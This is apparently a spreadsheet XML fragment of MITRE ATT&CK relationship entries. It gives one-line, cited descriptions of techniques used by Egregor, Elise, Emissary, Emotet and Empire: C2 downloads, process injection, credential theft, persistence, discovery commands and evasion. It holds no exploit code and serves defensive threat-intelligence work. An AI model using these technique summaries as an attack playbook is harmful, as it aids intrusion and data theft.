    <t>relationship--e50d74be-2705-4937-9bd9-7b0913901e27</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has the ability to download files from its C2 server.(Citation: Cybereason Egregor Nov 2020)(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t>relationship--87182fef-ddbc-466e-b55b-989f10592d0c</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has masqueraded the svchost.exe process to exfiltrate data.(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t>relationship--6c6a8e6f-3340-4cd7-8abb-c39c408440f1</t>
  </si>
  <si>
    <t xml:space="preserve">[Egregor](https://attack.mitre.org/software/S0554) has used the Windows API to make detection more difficult.(Citation: Cyble Egregor Oct 2020) </t>
  </si>
  <si>
    <t>relationship--5bcec016-2150-4c45-9e9b-228838c9e843</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has used an encoded PowerShell command by a service created by [Cobalt Strike](https://attack.mitre.org/software/S0154) for lateral movement.(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t>relationship--eddcfbbf-9e82-4029-87fe-bf0f6bea0ba9</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) can inject its payload into iexplore.exe process.(Citation: Cyble Egregor Oct 2020)</t>
  </si>
  <si>
    <t>relationship--e88d0a1d-9861-4260-b030-dd80e81d179a</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has used regsvr32.exe to execute malicious DLLs.(Citation: JoeSecurity Egregor 2020)</t>
  </si>
  <si>
    <t>relationship--b3cb9975-adb2-422c-a8b3-0b1ea230d4e4</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has checked for the LogMein event log in an attempt to encrypt files in remote machines.(Citation: Cyble Egregor Oct 2020)</t>
  </si>
  <si>
    <t>relationship--de071e4d-eee7-4ad5-96b6-fe83bfe3e25a</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has used rundll32 during execution.(Citation: Cybereason Egregor Nov 2020)</t>
  </si>
  <si>
    <t>relationship--218617ce-6474-4fd4-920e-88207c5aa219</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554)'s payloads are custom-packed, archived and encrypted to prevent analysis.(Citation: NHS Digital Egregor Nov 2020)(Citation: Cyble Egregor Oct 2020)</t>
  </si>
  <si>
    <t>relationship--552c3e40-dbb9-4675-bc31-5436a15253d8</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) can perform a language check of the infected system and can query the CPU information (cupid).(Citation: JoeSecurity Egregor 2020)(Citation: NHS Digital Egregor Nov 2020)</t>
  </si>
  <si>
    <t>relationship--f0a74237-9a46-4ea8-a268-3ac87f593ea9</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) can enumerate all connected drives.(Citation: NHS Digital Egregor Nov 2020)</t>
  </si>
  <si>
    <t>relationship--783b7e83-90ee-4628-80a5-c087258290ab</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has used tools to gather information about users.(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t>relationship--830b40b0-ffc8-4847-8849-27b62c9e84b6</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) contains functionality to query the local/system time.(Citation: JoeSecurity Egregor 2020)</t>
  </si>
  <si>
    <t>relationship--4467fb1b-60fe-4e13-a32a-8c1f60a66782</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) can perform a  long sleep (greater than or equal to 3 minutes) to evade detection.(Citation: JoeSecurity Egregor 2020)</t>
  </si>
  <si>
    <t>relationship--1492575f-9e3d-4ba0-ae2d-66711120adf6</t>
  </si>
  <si>
    <t xml:space="preserve">[Egregor](https://attack.mitre.org/software/S0554) has used multiple anti-analysis and anti-sandbox techniques to prevent automated analysis by sandboxes.(Citation: Cyble Egregor Oct 2020)(Citation: NHS Digital Egregor Nov 2020) </t>
  </si>
  <si>
    <t>relationship--89ef773b-6d5d-482e-9afd-bc892eb8093e</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has communicated with its C2 servers via HTTPS protocol.(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t>relationship--c18699a3-915b-4c5f-b81a-a248cb558aaa</t>
  </si>
  <si>
    <t xml:space="preserve">[Egregor](https://attack.mitre.org/software/S0554) has used batch files for execution and can launch Internet Explorer from cmd.exe.(Citation: JoeSecurity Egregor 2020)(Citation: Cybereason Egregor Nov 2020) </t>
  </si>
  <si>
    <t>relationship--e5080d8c-37e3-4a64-8983-f92356850c99</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) injects DLL files into iexplore.exe.(Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>relationship--f72d9605-eea6-4ed4-8502-231d4c21431f</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) is capable of launching a remote shell on the host to delete itself.(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>relationship--ad595353-854a-4e2d-b569-7cbe7130015d</t>
  </si>
  <si>
    <t>A variant of [Elise](https://attack.mitre.org/software/S0081) executes &lt;code&gt;dir C:\progra~1&lt;/code&gt; when initially run.(Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>relationship--6e39f6fe-3808-41ae-9263-1fd23865bd7b</t>
  </si>
  <si>
    <t>25 October 2019</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) can download additional files from the C2 server for execution.(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>relationship--138c4559-eae3-49a2-baea-b9549aef881c</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) executes &lt;code&gt;net user&lt;/code&gt; after initial communication is made to the remote server.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>relationship--c987dc63-ef3d-43aa-9344-bd9fd528c55d</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) creates a file in &lt;code&gt;AppData\Local\Microsoft\Windows\Explorer&lt;/code&gt; and stores all harvested data in that file.(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>relationship--9e77c6fc-0227-42d6-b4ce-f228115963fe</t>
  </si>
  <si>
    <t>If installing itself as a service fails, [Elise](https://attack.mitre.org/software/S0081) instead writes itself as a file named svchost.exe saved in %APPDATA%\Microsoft\Network.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>relationship--0fd5d3bc-d736-43c0-b9ec-f1dcd95411a7</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) encrypts several of its files, including configuration files.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>relationship--68bbad6c-1685-4275-bd36-b885a64caf6d</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) enumerates processes via the &lt;code&gt;tasklist&lt;/code&gt; command.(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>relationship--496378e6-ab36-4d3b-9ae3-c493a5b56877</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</si>
  <si>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</si>
  <si>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relationship--f696324d-7fb4-44ca-82dd-3385b55fbb80</t>
  </si>
  <si>
    <t>After copying itself to a DLL file, a variant of [Elise](https://attack.mitre.org/software/S0081) calls the DLL file using rundll32.exe.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>relationship--37ab6b56-033c-4cb6-8d1b-e7ff5dcf668d</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) exfiltrates data using cookie values that are Base64-encoded.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>relationship--c667befa-7242-47f8-bdc1-1056f62bb466</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) encrypts exfiltrated data with RC4.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>relationship--1a028242-1896-4867-a691-c97867f1663d</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) executes &lt;code&gt;systeminfo&lt;/code&gt; after initial communication is made to the remote server.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>relationship--14135aaa-6080-48c1-8a08-d6ee9bb15c3d</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) executes &lt;code&gt;ipconfig /all&lt;/code&gt; after initial communication is made to the remote server.(Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>relationship--340d4ef7-816b-4758-994f-b913df78afd7</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) executes &lt;code&gt;net start&lt;/code&gt; after initial communication is made to the remote server.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>relationship--2a7d01e9-9c42-4d17-947a-629ca7a9d515</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) performs timestomping of a CAB file it creates.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>relationship--6deeb486-90c3-4279-8549-17c81ea2466b</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) communicates over HTTP or HTTPS for C2.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>relationship--bc60180b-2db6-4e0d-8b98-d349db637777</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) configures itself as a service.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>relationship--2d4d634d-ed13-462a-916b-94798546ec6c</t>
  </si>
  <si>
    <t>A variant of [Emissary](https://attack.mitre.org/software/S0082) appends junk data to the end of its DLL file to create a large file that may exceed the maximum size that anti-virus programs can scan.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>relationship--d200ba08-8179-495e-a854-9b13be5c0f93</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) injects its DLL file into a newly spawned Internet Explorer process.(Citation: Lotus Blossom Dec 2015)</t>
  </si>
  <si>
    <t>relationship--106aae81-fab1-42b3-97b0-4f0c1d67c896</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) has the capability to execute &lt;code&gt;gpresult&lt;/code&gt;.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>relationship--8a84e8a4-2e4f-4d38-8a0d-6a5b1fcfd542</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) has the capability to download files from the C2 server.(Citation: Lotus Blossom Dec 2015)</t>
  </si>
  <si>
    <t>relationship--85ca1e00-24c4-403e-8aff-9890f91e9b78</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) has the capability to execute the command &lt;code&gt;net localgroup administrators&lt;/code&gt;.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>relationship--8ca14a24-b8b3-4669-ae56-e7102b543dc6</t>
  </si>
  <si>
    <t>Variants of [Emissary](https://attack.mitre.org/software/S0082) encrypt payloads using various XOR ciphers, as well as a custom algorithm that uses the "srand" and "rand" functions.(Citation: Lotus Blossom Dec 2015)(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>relationship--021c3289-43bb-4787-9d7e-6ad17b3ce84f</t>
  </si>
  <si>
    <t>Variants of [Emissary](https://attack.mitre.org/software/S0082) have added Run Registry keys to establish persistence.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>relationship--0040fdbd-ec7e-49b3-b715-c8c91e08666b</t>
  </si>
  <si>
    <t>Variants of [Emissary](https://attack.mitre.org/software/S0082) have used rundll32.exe in Registry values added to establish persistence.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>relationship--1c6f35f0-1169-4218-9881-7291e1765cd8</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</si>
  <si>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</si>
  <si>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relationship--4b5540e5-eac1-40f4-93d0-155f60e9395a</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) has the capability to execute ver and systeminfo commands.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>relationship--4a959425-4d43-4969-9a47-768894a3afaa</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) has the capability to execute the command &lt;code&gt;ipconfig /all&lt;/code&gt;.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>relationship--1ec53623-4050-498b-ba9e-f149d203036c</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) has the capability to execute the command &lt;code&gt;net start&lt;/code&gt; to interact with services.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>relationship--bae7f2fb-99d8-4acf-b61e-f37a215aa82e</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) uses HTTP or HTTPS for C2.(Citation: Lotus Blossom Dec 2015)</t>
  </si>
  <si>
    <t>relationship--73171e71-b769-41ff-874a-ff76da43541f</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) has the capability to create a remote shell and execute specified commands.(Citation: Lotus Blossom Dec 2015)</t>
  </si>
  <si>
    <t>relationship--2c158663-599b-45a8-b946-6d545206428d</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) is capable of configuring itself as a service.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>relationship--ea6289bb-c974-4e4c-bdc4-1c3211a6d1d4</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed encrypting the data it collects before sending it to the C2 server. (Citation: Fortinet Emotet May 2017)</t>
  </si>
  <si>
    <t>relationship--088ed15f-46da-4b32-a182-68553c61f09b</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) is known to use RSA keys for encrypting C2 traffic. (Citation: Trend Micro Emotet Jan 2019)</t>
  </si>
  <si>
    <t>relationship--095a259d-79c7-42b0-b65a-e423f110d187</t>
  </si>
  <si>
    <t>26 March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</si>
  <si>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</si>
  <si>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relationship--9f6eef25-7a90-4f74-a788-8022166952f8</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed leveraging a module that retrieves passwords stored on a system for the current logged-on user. (Citation: US-CERT Emotet Jul 2018)(Citation: CIS Emotet Dec 2018)</t>
  </si>
  <si>
    <t>relationship--09c80e35-2839-4b5b-aad8-8f81db8da551</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed dropping browser password grabber modules. (Citation: Trend Micro Emotet Jan 2019)(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>relationship--7ac04e64-a09e-4a66-b6ce-047030400045</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has used a self-extracting RAR file to deliver modules to victims. Emotet has also extracted embedded executables from files using hard-coded buffer offsets.(Citation: Binary Defense Emotes Wi-Fi Spreader)</t>
  </si>
  <si>
    <t>relationship--7e4db234-1923-4bfb-ab32-284f31182c76</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed injecting in to Explorer.exe and other processes. (Citation: Picus Emotet Dec 2018)(Citation: Trend Micro Banking Malware Jan 2019)(Citation: US-CERT Emotet Jul 2018)</t>
  </si>
  <si>
    <t>relationship--e834920f-bc30-458e-b56e-80947d3a7c6e</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed leveraging a module that can scrape email addresses from Outlook.(Citation: CIS Emotet Dec 2018)(Citation: IBM IcedID November 2017)(Citation: Binary Defense Emotes Wi-Fi Spreader)</t>
  </si>
  <si>
    <t>relationship--d3dbd171-a82c-4fef-ba16-2355dd9b513e</t>
  </si>
  <si>
    <t>relationship--76d0dcb7-046a-40d7-80ec-e0e571359f51</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has dropped an embedded executable at `%Temp%\setup.exe`.(Citation: Binary Defense Emotes Wi-Fi Spreader)</t>
  </si>
  <si>
    <t>relationship--58e22fa6-5925-40b7-9df6-4cda34892ea6</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has exfiltrated data over its C2 channel.(Citation: Trend Micro Emotet Jan 2019)(Citation: Binary Defense Emotes Wi-Fi Spreader)</t>
  </si>
  <si>
    <t>relationship--5201448e-f009-4c24-abb5-9382383dc42d</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</si>
  <si>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</si>
  <si>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relationship--6cb2f741-eedb-4b1d-8d84-7823f0095d44</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed dropping password grabber modules including [Mimikatz](https://attack.mitre.org/software/S0002). (Citation: Trend Micro Emotet Jan 2019)</t>
  </si>
  <si>
    <t>relationship--a0321bbd-edab-4ee6-be37-979015511e4a</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has copied itself to remote systems using the `service.exe` filename.(Citation: Binary Defense Emotes Wi-Fi Spreader)</t>
  </si>
  <si>
    <t>relationship--0694d72f-cf4b-4355-b485-ccbd8d3a22b2</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) can brute force a local admin password, then use it to facilitate lateral movement.(Citation: Malwarebytes Emotet Dec 2017)</t>
  </si>
  <si>
    <t>relationship--30930d8a-3c0d-41b2-a226-cccc56599bfd</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed leveraging a module that scrapes email data from Outlook.(Citation: CIS Emotet Dec 2018)</t>
  </si>
  <si>
    <t>relationship--ea023f09-6a7d-445c-a39d-5e57eea2706b</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has relied upon users clicking on a malicious attachment delivered through spearphishing.(Citation: Trend Micro Banking Malware Jan 2019)(Citation: Carbon Black Emotet Apr 2019)(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>relationship--219dcd0b-a6fe-47d4-99b9-24d945b1f168</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has relied upon users clicking on a malicious link delivered through spearphishing.(Citation: Trend Micro Banking Malware Jan 2019)(Citation: Carbon Black Emotet Apr 2019)</t>
  </si>
  <si>
    <t>relationship--90b7c9e6-53db-4656-a5ee-f8056a8d6ef7</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has installed itself as a new service with the service name `Windows Defender System Service` and display name `WinDefService`.(Citation: Binary Defense Emotes Wi-Fi Spreader)</t>
  </si>
  <si>
    <t>relationship--9da66aaa-79be-426c-8abe-3c68a9159e8b</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has used `CreateProcess` to create a new process to run its executable and `WNetEnumResourceW` to enumerate non-hidden shares.(Citation: Binary Defense Emotes Wi-Fi Spreader)</t>
  </si>
  <si>
    <t>relationship--fba17e05-d7dd-4944-97c8-7771d6b833fb</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has enumerated non-hidden network shares using `WNetEnumResourceW`. (Citation: Binary Defense Emotes Wi-Fi Spreader)</t>
  </si>
  <si>
    <t>relationship--491dc622-fa43-4015-b24a-8ec8d8f5a376</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed to hook network APIs to monitor network traffic. (Citation: Trend Micro Banking Malware Jan 2019)</t>
  </si>
  <si>
    <t>relationship--aa6d74b0-3db2-4679-bf1c-03d3dd7561b0</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has used HTTP over ports such as 20, 22, 443, 7080, and 50000, in addition to using ports commonly associated with HTTP/S.(Citation: Talos Emotet Jan 2019)(Citation: Binary Defense Emotes Wi-Fi Spreader)</t>
  </si>
  <si>
    <t>relationship--12c14ace-db29-4b08-a052-ba867c9ba534</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</si>
  <si>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</si>
  <si>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relationship--0c76bb94-1a6e-4ec6-9faa-2b444d80002c</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</si>
  <si>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</si>
  <si>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relationship--7b458295-8e67-4f1f-acde-3316ae2e061e</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed enumerating local processes.(Citation: ASEC Emotet 2017)</t>
  </si>
  <si>
    <t>relationship--e39eb7ad-f233-4c22-8707-aaf600f42100</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has reflectively loaded payloads into memory.(Citation: Binary Defense Emotes Wi-Fi Spreader)</t>
  </si>
  <si>
    <t>relationship--b92542f4-97bc-4e75-9f92-328c25a007ef</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</si>
  <si>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</si>
  <si>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relationship--3236ca50-2342-455a-b258-6a085cae8fc2</t>
  </si>
  <si>
    <t xml:space="preserve">[Emotet](https://attack.mitre.org/software/S0367) has leveraged the Admin$, C$, and IPC$ shares for lateral movement. (Citation: Malwarebytes Emotet Dec 2017)(Citation: Binary Defense Emotes Wi-Fi Spreader) </t>
  </si>
  <si>
    <t>relationship--1bc150db-66ca-4361-84a2-2dd0f104790f</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has maintained persistence through a scheduled task. (Citation: US-CERT Emotet Jul 2018)</t>
  </si>
  <si>
    <t>relationship--7a28c0d9-28cf-4881-b8a5-8d779eb76e0d</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has used custom packers to protect its payloads.(Citation: Trend Micro Emotet Jan 2019)</t>
  </si>
  <si>
    <t>relationship--d4c5a3a8-203d-4201-80fa-48b5ac9a533f</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</si>
  <si>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</si>
  <si>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relationship--cc4f0b64-db39-4546-a5fc-a518ecc5438b</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</si>
  <si>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</si>
  <si>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relationship--382b8780-edc3-477f-a7fa-3e6ba62397a2</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has used Google’s Protobufs to serialize data sent to and from the C2 server.(Citation: Binary Defense Emotes Wi-Fi Spreader)</t>
  </si>
  <si>
    <t>relationship--48a7db34-eee7-4358-918b-0cc802aaec03</t>
  </si>
  <si>
    <t>14 October 2023</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has enumerated all users connected to network shares.</t>
  </si>
  <si>
    <t>relationship--05e02170-dc4f-4112-a54c-fde4d05632d7</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has the ability to duplicate the user’s token.(Citation: Binary Defense Emotes Wi-Fi Spreader)</t>
  </si>
  <si>
    <t>relationship--2b16958e-8c41-4342-87d8-f98b42548724</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</si>
  <si>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</si>
  <si>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relationship--88309efb-b366-4c4a-bd23-ba43b9f05c4c</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has used HTTP for command and control.(Citation: Binary Defense Emotes Wi-Fi Spreader)</t>
  </si>
  <si>
    <t>relationship--50e590c6-32bb-452c-a0ba-20c2ee6f0030</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) can extract names of all locally reachable Wi-Fi networks and then perform a brute-force attack to spread to new networks.(Citation: Binary Defense Emotes Wi-Fi Spreader)</t>
  </si>
  <si>
    <t>relationship--fe8a52b2-b1b8-4193-a637-abd9ec219e6a</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has used cmd.exe to run a PowerShell script. (Citation: Picus Emotet Dec 2018)</t>
  </si>
  <si>
    <t>relationship--c9e27933-d6fa-427b-b4ff-2367a2d7d060</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has used WMI to execute powershell.exe.(Citation: Carbon Black Emotet Apr 2019)</t>
  </si>
  <si>
    <t>relationship--11f31998-c76f-4433-8e9c-c0ef0b7574d5</t>
  </si>
  <si>
    <t xml:space="preserve">[Emotet](https://attack.mitre.org/software/S0367) has been observed creating new services to maintain persistence.(Citation: US-CERT Emotet Jul 2018)(Citation: Secureworks Emotet Nov 2018)(Citation: Binary Defense Emotes Wi-Fi Spreader) </t>
  </si>
  <si>
    <t>relationship--eba0a033-02a9-45e8-a1a1-27df73d6442b</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use [PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Invoke-TokenManipulation&lt;/code&gt; to manipulate access tokens.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--9bd9e08d-efda-4710-8158-9e915dce16d9</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can leverage WMI debugging to remotely replace binaries like sethc.exe, Utilman.exe, and Magnify.exe with cmd.exe.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--47899da0-29da-4518-b94a-0f08bc01e5c9</t>
  </si>
  <si>
    <t>11 March 2019</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can ZIP directories on the target system.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--32fc949c-2127-425b-9480-6d07ead49982</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use TLS to encrypt its C2 channel.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--e26cfb89-f796-4ba1-bf5c-4084b6479762</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can automatically gather the username, domain name, machine name, and other information from a compromised system.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--4be42e8a-4547-43c5-97bf-01440994f95b</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has the ability to automatically send collected data back to the threat actors' C2.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--45608b9a-ddd8-45f9-9152-bed384a1c8c3</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use Dropbox and GitHub for C2.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--ac4e0574-879e-4155-84ed-5b2d8be0b603</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has the ability to gather browser data such as bookmarks and visited sites.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--88427fdf-9d70-49d2-a7ca-4c79ee387d3d</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) includes various modules to attempt to bypass UAC for escalation of privileges.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--fb16dea3-7f32-4778-b6af-3126c4547d17</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can harvest clipboard data on both Windows and macOS systems.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--3ca37791-9dad-430f-aee9-0126d13ae932</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has the ability to obfuscate commands using &lt;code&gt;Invoke-Obfuscation&lt;/code&gt;.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--16e0be5b-93bb-4db2-b6ed-02e34a6ce3cb</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) uses a command-line interface to interact with systems.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--ee448e12-4b71-4c0c-bcca-daff26072d41</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use &lt;code&gt;Invoke-RunAs&lt;/code&gt; to make tokens.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--e5539e56-e35f-4097-9862-ba26cac35346</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains some modules that leverage API hooking to carry out tasks, such as netripper.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--7d349715-69e8-4e3c-bb98-8dc8d3051ca2</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use various modules to search for files containing passwords.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--3237c264-c70c-4fe4-9f53-a8709c3dd006</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use modules that extract passwords from common web browsers such as Firefox and Chrome.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--b97afcfc-489a-4d59-89b3-1533eae926e0</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains modules that can discover and exploit various DLL hijacking opportunities.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--f2b3374e-d2b4-489a-9c8a-92630ce9b428</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can utilize &lt;code&gt;Invoke-DCOM&lt;/code&gt; to leverage remote COM execution for lateral movement.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--04878c23-0ba8-4893-acd7-f0594241b66f</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can acquire local and domain user account information.(Citation: Github PowerShell Empire)(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>relationship--58b7b9bf-d09b-49f4-acf5-351979171317</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has a module for creating a new domain user if permissions allow.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--f3f4558a-a0bd-4162-92e4-be986ec1511d</t>
  </si>
  <si>
